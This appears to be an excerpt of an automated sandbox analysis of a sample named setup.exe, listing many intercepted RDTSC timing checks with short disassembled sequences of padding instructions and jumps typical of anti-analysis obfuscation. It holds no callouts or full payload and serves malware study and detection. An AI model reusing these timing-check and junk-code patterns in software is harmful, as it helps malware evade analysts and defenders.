Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF175 second address: 3EF17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF17B second address: 3EF17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF30C second address: 3EF312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF312 second address: 3EF31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDDE8CE13D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF31C second address: 3EF320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF320 second address: 3EF326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF8A2 second address: 3EF8AE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDDE9067F66h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF8AE second address: 3EF8C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE8CE13DDh 0x00000009 js 00007FDDE8CE13D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF8C5 second address: 3EF8CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EFA12 second address: 3EFA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FDDE8CE13E8h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3F44D4 second address: 3F44F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FDDE9067F79h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FA9B8 second address: 3FA9C2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDDE8CE13D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FA9C2 second address: 3FAA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FDDE9067F84h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FDDE9067F6Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FDDE9067F66h 0x0000001d jmp 00007FDDE9067F70h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FAA11 second address: 3FAA1B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDE8CE13D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FAA1B second address: 3FAA4F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDDE9067F7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDDE9067F74h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FAA4F second address: 3FAA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FB13F second address: 3FB143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3FBA2F second address: 3FBA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40F39E second address: 40F3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40F3A4 second address: 40F3CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDDE8CE13DAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40F21D second address: 40F223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40F223 second address: 40F229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 413A9F second address: 413AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jc 00007FDDE9067F68h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 413C85 second address: 413C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 413C8E second address: 413C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4168E0 second address: 4168E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4168E9 second address: 4168EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 416A3D second address: 416A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E0h 0x00000007 jmp 00007FDDE8CE13E8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FDDE8CE13E9h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 416A8A second address: 416AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDDE9067F66h 0x0000000a jmp 00007FDDE9067F6Dh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4239DC second address: 4239E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007FDDE8CE13DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4239E9 second address: 4239EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4239EF second address: 423A01 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FDDE8CE13D6h 0x00000009 pop ebx 0x0000000a js 00007FDDE8CE13DEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 423873 second address: 423879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 423879 second address: 42387F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42FA4B second address: 42FA5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE9067F6Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42FA5C second address: 42FA60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42E36F second address: 42E37F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007FDDE9067F66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42E37F second address: 42E385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42E385 second address: 42E389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42E389 second address: 42E391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42E6A2 second address: 42E6C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42E6C1 second address: 42E6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42E6C8 second address: 42E6E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDDE9067F6Ah 0x00000008 jno 00007FDDE9067F66h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jp 00007FDDE9067F66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42EAE8 second address: 42EAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42F72E second address: 42F76E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDDE9067F66h 0x00000008 jmp 00007FDDE9067F6Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FDDE9067F6Eh 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007FDDE9067F7Bh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42F76E second address: 42F79B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDDE8CE13E9h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42F79B second address: 42F79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 432790 second address: 432797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 432311 second address: 432355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FDDE9067F70h 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FDDE9067F79h 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 442BB7 second address: 442BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDDE8CE13DEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 442BD0 second address: 442BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 34B2D0 second address: 34B2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453E90 second address: 453EAA instructions: 0x00000000 rdtsc 0x00000002 js 00007FDDE9067F6Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FDDE9067F66h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453EAA second address: 453EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453EAE second address: 453EB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453EB8 second address: 453EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453EBE second address: 453EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453EC2 second address: 453EC8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453BE8 second address: 453C05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDDE9067F6Ah 0x00000010 push esi 0x00000011 jne 00007FDDE9067F66h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46BB40 second address: 46BB4B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FDDE8CE13D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46BCBD second address: 46BCE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FDDE9067F6Ch 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46BCE0 second address: 46BCF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDE8CE13E3h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46BE2D second address: 46BE44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F72h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46BE44 second address: 46BE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46C0EC second address: 46C107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDDE9067F72h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46C407 second address: 46C40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46C6FF second address: 46C707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46C707 second address: 46C716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FDDE8CE13D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46C9D3 second address: 46C9E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007FDDE9067F66h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46E2E4 second address: 46E2EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46E2EA second address: 46E2F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FDDE9067F66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 471042 second address: 471059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FDDE8CE13D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 471059 second address: 47105D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47105D second address: 471067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 471067 second address: 47107A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FDDE9067F66h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47107A second address: 471080 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 471080 second address: 47109E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDDE9067F71h 0x00000008 jmp 00007FDDE9067F6Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47109E second address: 4710A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4710A4 second address: 4710A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4710A9 second address: 4710B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47132E second address: 471338 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDDE9067F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 471338 second address: 471394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FDDE8CE13EFh 0x00000010 pushad 0x00000011 jbe 00007FDDE8CE13D6h 0x00000017 jmp 00007FDDE8CE13E1h 0x0000001c popad 0x0000001d nop 0x0000001e mov dword ptr [ebp+122D1F6Dh], esi 0x00000024 push dword ptr [ebp+122D2723h] 0x0000002a jmp 00007FDDE8CE13E7h 0x0000002f push 346B2A51h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 471394 second address: 47139B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47139B second address: 4713A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4713A1 second address: 4713A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47422E second address: 474232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 474232 second address: 474262 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDDE9067F66h 0x00000008 jnc 00007FDDE9067F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FDDE9067F75h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c pop eax 0x0000001d push edi 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 474262 second address: 47426E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FDDE8CE13D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47426E second address: 474272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 474272 second address: 474278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 473DFE second address: 473E08 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDDE9067F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 475D4F second address: 475D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDDE8CE13D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FDDE8CE13DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB0E43 second address: 4CB0E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007FDDE9067F6Ch 0x0000000d xor esi, 3A8FC578h 0x00000013 jmp 00007FDDE9067F6Bh 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB0E69 second address: 4CB0EAD instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FDDE8CE13E5h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FDDE8CE13DEh 0x00000013 mov ebp, esp 0x00000015 jmp 00007FDDE8CE13E0h 0x0000001a pop ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA0E8D second address: 4CA0EB2 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, 3ED894D5h 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov eax, 478F898Dh 0x00000015 mov esi, 1B783189h 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ax, dx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA0EB2 second address: 4CA0EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
